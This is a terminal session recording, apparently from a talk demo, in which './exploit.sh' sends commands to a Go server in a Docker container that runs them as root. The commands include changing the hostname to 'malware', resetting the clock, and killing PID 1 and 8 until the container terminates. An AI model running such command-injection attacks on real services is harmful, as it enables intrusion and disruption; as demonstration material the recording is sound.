[99.333596, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Cps\u001b[C-ef\r\n\u001b[?25l\u001b[HRunning: ls -l\u001b[K\r\nRunning: id\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: hostname malware\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: date\u001b[K\r\nRunning: date 123123591999\u001b[K\r\nRunning: date\u001b[K\r\nRunning: ping -c 1 8.8.8.8\u001b[K\r\nRunning: ps -ef\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[99.439889, "o", "\u001b[13;23r\u001b[H\u001b[23dUID\u001b[8CPID\u001b[2CPPID\u001b[2CC\u001b[CSTIME\u001b[CTTY\u001b[10CTIME\u001b[CCMD\r\n\u001b[?25l\u001b[13drtt min/avg/max/mdev = 9.373/9.373/9.373/0.000 ms\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh ps -ef\u001b[K\r\ntrying to run: ps -ef\u001b[K\r\nUID        PID  PPID  C STIME TTY          TIME CMD\u001b[K\r\nroot         1     0  0 16:39 pts/0    00:00:00 /bin/sh -c go run main.go\u001b[K\r\nroot         8     1  1 16:39 pts/0    00:00:00 go run main.go\u001b[K\r\nroot       312     8  0 16:39 pts/0    00:00:00 /tmp/go-build381592154/b001/exe/main\u001b[K\r\nroot       336   312  0 16:40 pts/0    00:00:00 /bin/sh -c ps -ef\u001b[K\r\nroot       337   336  0 16:40 pts/0    00:00:00 ps -ef\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[99.441015, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[101.280484, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13d$\u001b[K\r\n$ ./exploit.sh ps -ef\u001b[K\r\ntrying to run: ps -ef\u001b[K\r\nUID        PID  PPID  C STIME TTY          TIME CMD\u001b[K\r\nroot         1     0  0 16:39 pts/0    00:00:00 /bin/sh -c go run main.go\u001b[K\r\nroot         8     1  1 16:39 pts/0    00:00:00 go run main.go\u001b[K\r\nroot       312     8  0 16:39 pts/0    00:00:00 /tmp/go-build381592154/b001/exe/main\u001b[K\r\nroot       336   312  0 16:40 pts/0    00:00:00 /bin/sh -c ps -ef\u001b[K\r\nroot       337   336  0 16:40 pts/0    00:00:00 ps -ef\u001b[K\r\n$\u001b[K\r\n$\u001b[K\u001b[1;24r\u001b[H\u001b[23;3H\u001b[?12l\u001b[?25h"]
[102.12315, "o", "\u001b[13;23r\u001b[H\u001b[23;3H.\u001b[1;24r\u001b[H\u001b[23;4H"]
[102.223513, "o", "\u001b[13;23r\u001b[H\u001b[23;4H/\u001b[1;24r\u001b[H\u001b[23;5H"]
[102.385133, "o", "\u001b[13;23r\u001b[H\u001b[23;5He\u001b[1;24r\u001b[H\u001b[23;6H"]
[102.57194, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hx\u001b[1;24r\u001b[H\u001b[23;7H"]
[102.863057, "o", "\u001b[13;23r\u001b[H\u001b[23;7Hploit.sh\u001b[1;24r\u001b[H\u001b[23;16H"]
[105.75883, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hk\u001b[1;24r\u001b[H\u001b[23;17H"]
[105.917259, "o", "\u001b[13;23r\u001b[H\u001b[23;17Hi\u001b[1;24r\u001b[H\u001b[23;18H"]
[106.112419, "o", "\u001b[13;23r\u001b[H\u001b[23;18Hl\u001b[1;24r\u001b[H\u001b[23;19H"]
[106.255996, "o", "\u001b[13;23r\u001b[H\u001b[23;19Hl\u001b[1;24r\u001b[H\u001b[23;20H"]
[106.496913, "o", "\u001b[C"]
[107.186826, "o", "\u001b[13;23r\u001b[H\u001b[23;21H1\u001b[1;24r\u001b[H\u001b[23;22H"]
[107.661223, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13d$ ./exploit.sh ps -ef\u001b[K\r\ntrying to run: ps -ef\u001b[K\r\nUID        PID  PPID  C STIME TTY          TIME CMD\u001b[K\r\nroot         1     0  0 16:39 pts/0    00:00:00 /bin/sh -c go run main.go\u001b[K\r\nroot         8     1  1 16:39 pts/0    00:00:00 go run main.go\u001b[K\r\nroot       312     8  0 16:39 pts/0    00:00:00 /tmp/go-build381592154/b001/exe/main\u001b[K\r\nroot       336   312  0 16:40 pts/0    00:00:00 /bin/sh -c ps -ef\u001b[K\r\nroot       337   336  0 16:40 pts/0    00:00:00 ps -ef\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 1\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[107.66264, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Ckill\u001b[C1\r\n\u001b[?25l\u001b[13dtrying to run: ps -ef\u001b[K\r\nUID        PID  PPID  C STIME TTY          TIME CMD\u001b[K\r\nroot         1     0  0 16:39 pts/0    00:00:00 /bin/sh -c go run main.go\u001b[K\r\nroot         8     1  1 16:39 pts/0    00:00:00 go run main.go\u001b[K\r\nroot       312     8  0 16:39 pts/0    00:00:00 /tmp/go-build381592154/b001/exe/main\u001b[K\r\nroot       336   312  0 16:40 pts/0    00:00:00 /bin/sh -c ps -ef\u001b[K\r\nroot       337   336  0 16:40 pts/0    00:00:00 ps -ef\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 1\u001b[K\r\ntrying to run: kill 1\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[107.676597, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Ckill\u001b[C1\r\n\u001b[?25l\u001b[HRunning: id\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: hostname malware\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: date\u001b[K\r\nRunning: date 123123591999\u001b[K\r\nRunning: date\u001b[K\r\nRunning: ping -c 1 8.8.8.8\u001b[K\r\nRunning: ps -ef\u001b[K\r\nRunning: kill 1\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[107.678871, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[109.142922, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13dUID        PID  PPID  C STIME TTY          TIME CMD\u001b[K\r\nroot         1     0  0 16:39 pts/0    00:00:00 /bin/sh -c go run main.go\u001b[K\r\nroot         8     1  1 16:39 pts/0    00:00:00 go run main.go\u001b[K\r\nroot       312     8  0 16:39 pts/0    00:00:00 /tmp/go-build381592154/b001/exe/main\u001b[K\r\nroot       336   312  0 16:40 pts/0    00:00:00 /bin/sh -c ps -ef\u001b[K\r\nroot       337   336  0 16:40 pts/0    00:00:00 ps -ef\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 1\u001b[K\r\ntrying to run: kill 1\u001b[K\r\n$\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h\u001b[13;23r\u001b[H\u001b[23d$"]
[109.143209, "o", "\u001b[1;24r\u001b[H\u001b[23;3H"]
[109.669806, "o", "\u001b[13;23r\u001b[H\u001b[23;3H.\u001b[1;24r\u001b[H\u001b[23;4H"]
[109.743958, "o", "\u001b[13;23r\u001b[H\u001b[23;4H/\u001b[1;24r\u001b[H\u001b[23;5H"]
[109.946998, "o", "\u001b[13;23r\u001b[H\u001b[23;5He\u001b[1;24r\u001b[H\u001b[23;6H"]
[110.138634, "o", "\u001b[13;23r\u001b[H\u001b[23;6Hx\u001b[1;24r\u001b[H\u001b[23;7H"]
[110.408219, "o", "\u001b[13;23r\u001b[H\u001b[23;7Hploit.sh\u001b[1;24r\u001b[H\u001b[23;16H"]
[110.883777, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hk\u001b[1;24r\u001b[H\u001b[23;17H"]
[111.052498, "o", "\u001b[13;23r\u001b[H\u001b[23;17Hi\u001b[1;24r\u001b[H\u001b[23;18H"]
[111.241706, "o", "\u001b[13;23r\u001b[H\u001b[23;18Hl\u001b[1;24r\u001b[H\u001b[23;19H"]
[111.386081, "o", "\u001b[13;23r\u001b[H\u001b[23;19Hl\u001b[1;24r\u001b[H\u001b[23;20H"]
[111.465542, "o", "\u001b[C"]
[111.759323, "o", "\u001b[13;23r\u001b[H\u001b[23;21H8\u001b[1;24r\u001b[H\u001b[23;22H"]
[112.276962, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13droot         1     0  0 16:39 pts/0    00:00:00 /bin/sh -c go run main.go\u001b[K\r\nroot         8     1  1 16:39 pts/0    00:00:00 go run main.go\u001b[K\r\nroot       312     8  0 16:39 pts/0    00:00:00 /tmp/go-build381592154/b001/exe/main\u001b[K\r\nroot       336   312  0 16:40 pts/0    00:00:00 /bin/sh -c ps -ef\u001b[K\r\nroot       337   336  0 16:40 pts/0    00:00:00 ps -ef\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 1\u001b[K\r\ntrying to run: kill 1\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 8\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[112.27868, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Ckill\u001b[C8\r\n\u001b[?25l\u001b[13droot         8     1  1 16:39 pts/0    00:00:00 go run main.go\u001b[K\r\nroot       312     8  0 16:39 pts/0    00:00:00 /tmp/go-build381592154/b001/exe/main\u001b[K\r\nroot       336   312  0 16:40 pts/0    00:00:00 /bin/sh -c ps -ef\u001b[K\r\nroot       337   336  0 16:40 pts/0    00:00:00 ps -ef\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 1\u001b[K\r\ntrying to run: kill 1\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 8\u001b[K\r\ntrying to run: kill 8\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[112.293989, "o", "\u001b[1;11r\u001b[H\u001b[11dRunning:\u001b[Ckill\u001b[C8\r\n\u001b[?25l\u001b[HRunning: hostname\u001b[K\r\nRunning: hostname malware\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: date\u001b[K\r\nRunning: date 123123591999\u001b[K\r\nRunning: date\u001b[K\r\nRunning: ping -c 1 8.8.8.8\u001b[K\r\nRunning: ps -ef\u001b[K\r\nRunning: kill 1\u001b[K\r\nRunning: kill 8\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[112.296985, "o", "\u001b[1;11r\u001b[H\u001b[11dTerminated\r\n\u001b[13;23r\u001b[H\u001b[23d$\u001b[?25l\u001b[HRunning: hostname malware\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: date\u001b[K\r\nRunning: date 123123591999\u001b[K\r\nRunning: date\u001b[K\r\nRunning: ping -c 1 8.8.8.8\u001b[K\r\nRunning: ps -ef\u001b[K\r\nRunning: kill 1\u001b[K\r\nRunning: kill 8\u001b[K\r\nTerminated\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23;3H\u001b[?12l\u001b[?25h"]
[114.763891, "o", "\u001b[1;11r\u001b[H\u001b[11d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[114.925212, "o", "\u001b[13;23r\u001b[H\u001b[23;3H./exploit.sh\u001b[Ckill\u001b[C8\u001b[1;24r\u001b[H\u001b[23;22H"]
[115.121596, "o", "\u001b[13;23r\u001b[H\u001b[23;21H1\u001b[1;24r\u001b[H\u001b[23;22H"]
[115.53732, "o", "\u001b[13;23r\u001b[H\u001b[23;16Hps -ef\u001b[1;24r\u001b[H\u001b[23;22H"]
[116.157867, "o", "\u001b[13;23r\u001b[H\u001b[23d\n\u001b[?25l\u001b[13droot       312     8  0 16:39 pts/0    00:00:00 /tmp/go-build381592154/b001/exe/main\u001b[K\r\nroot       336   312  0 16:40 pts/0    00:00:00 /bin/sh -c ps -ef\u001b[K\r\nroot       337   336  0 16:40 pts/0    00:00:00 ps -ef\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 1\u001b[K\r\ntrying to run: kill 1\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 8\u001b[K\r\ntrying to run: kill 8\u001b[K\r\n$ ./exploit.sh ps -ef\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[116.159839, "o", "\u001b[13;23r\u001b[H\u001b[23dtrying\u001b[Cto\u001b[Crun:\u001b[Cps\u001b[C-ef\r\n\u001b[?25l\u001b[13droot       336   312  0 16:40 pts/0    00:00:00 /bin/sh -c ps -ef\u001b[K\r\nroot       337   336  0 16:40 pts/0    00:00:00 ps -ef\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 1\u001b[K\r\ntrying to run: kill 1\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 8\u001b[K\r\ntrying to run: kill 8\u001b[K\r\n$ ./exploit.sh ps -ef\u001b[K\r\ntrying to run: ps -ef\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[116.173368, "o", "\u001b[13;23r\u001b[H\u001b[23dcurl:\u001b[C(7)\u001b[CFailed\u001b[Cto\u001b[Cconnect\u001b[Cto\u001b[Clocalhost\u001b[Cport\u001b[C6666:\u001b[CConnecti\u001b[1;24r\u001b[H\u001b[23;61H\u001b[13;23r\u001b[H\u001b[23;61Hon\u001b[Crefused\r\n"]
[116.173769, "o", "\u001b[?25l\u001b[13droot       337   336  0 16:40 pts/0    00:00:00 ps -ef\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 1\u001b[K\r\ntrying to run: kill 1\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 8\u001b[K\r\ntrying to run: kill 8\u001b[K\r\n$ ./exploit.sh ps -ef\u001b[K\r\ntrying to run: ps -ef\u001b[K\r\ncurl: (7) Failed to connect to localhost port 6666: Connection refused\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[116.174745, "o", "\u001b[13;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[120.008398, "o", "\u001b[13;23r\u001b[H\u001b[23;3Hlogout\r\n\u001b[?25l\u001b[13d$\u001b[K\r\n$ ./exploit.sh kill 1\u001b[K\r\ntrying to run: kill 1\u001b[K\r\n$\u001b[K\r\n$ ./exploit.sh kill 8\u001b[K\r\ntrying to run: kill 8\u001b[K\r\n$ ./exploit.sh ps -ef\u001b[K\r\ntrying to run: ps -ef\u001b[K\r\ncurl: (7) Failed to connect to localhost port 6666: Connection refused\u001b[K\r\n$ logout\u001b[K\r\n\u001b[K\u001b[1;24r\u001b[H\u001b[23d\u001b[?12l\u001b[?25h"]
[120.085574, "o", "\u001b[?25l\u001b[H ---> 7c964d8a2d47\u001b[K\r\nStep 4/4 : CMD go run main.go\u001b[K\r\n ---> Running in 44dd5bad7a7a\u001b[K\r\nRemoving intermediate container 44dd5bad7a7a\u001b[K\r\n ---> 90b30419e6e8\u001b[K\r\nSuccessfully built 90b30419e6e8\u001b[K\r\nSuccessfully tagged golang-demo:latest\u001b[K\r\n$ ./docker-run.sh\u001b[K\r\nReady to receive requests on port 6666\u001b[K\r\nRunning: ls -l\u001b[K\r\nRunning: id\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: hostname malware\u001b[K\r\nRunning: hostname\u001b[K\r\nRunning: date\u001b[K\r\nRunning: date 123123591999\u001b[K\r\nRunning: date\u001b[K\r\nRunning: ping -c 1 8.8.8.8\u001b[K\r\nRunning: ps -ef\u001b[K\r\nRunning: kill 1\u001b[K\r\nRunning: kill 8\u001b[K\r\nTerminated\u001b[K\r\n$\u001b[K\r\n\u001b[30m\u001b[42m[preso] 0:bash*                                         \"bmitch-asusr556l\" 11:40 09-Feb-19\u001b(B\u001b[m\u001b[23;3H\u001b[?12l\u001b[?25h"]
[120.0858, "o", "\r\u001b[K\u001b[1;23r\u001b[H\u001b[23d$\u001b[1;24r\u001b[H\u001b[23;3H"]
[121.304682, "o", "\u001b[1;24r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b]112\u0007\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?1005l\u001b[?1049l"]
[121.304939, "o", "[detached (from session preso)]\r\n"]
